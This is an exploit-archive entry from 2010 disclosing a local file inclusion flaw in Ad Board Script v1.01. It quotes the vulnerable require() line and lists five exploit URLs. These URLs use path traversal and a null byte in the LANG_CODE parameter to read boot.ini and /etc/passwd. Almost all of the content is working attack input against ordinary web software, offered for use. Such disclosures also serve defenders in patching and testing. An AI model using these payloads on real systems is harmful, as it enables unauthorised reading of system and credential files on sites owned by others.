[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Ad Board Script v1.01 Local File Inclusion
# Published : 2010-03-13
# Author : ItSecTeam
# Previous Title : GeekHelps ADMP v1.01 Multiple Vulnerabilities
# Next Title : Joomla Component com_start SQL Injection Vulnerability
hi
-------
#########################local file include#################
Author: ItSecTeam
download from:http://www.phpkobo.com/scripts/AF201_101/AF201_101.zip
script:Ad Board Script
Version:1.01
Updated:2010-01-10
dork::D
##########################################
vul:/path/web/codelib/cfg/common.inc.php line 21:
require( "res.{$LANG_CODE}.sys.inc.php" );
-----------------------------------------
xpl:/path/web/codelib/cfg/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
xpl:/path/web/codelib/sys/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
xpl:/path/web/staff/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
xpl:/path/web/staff/file.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
xpl:/path/web/staff/app/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
########################
discovered by ahmadbady
########################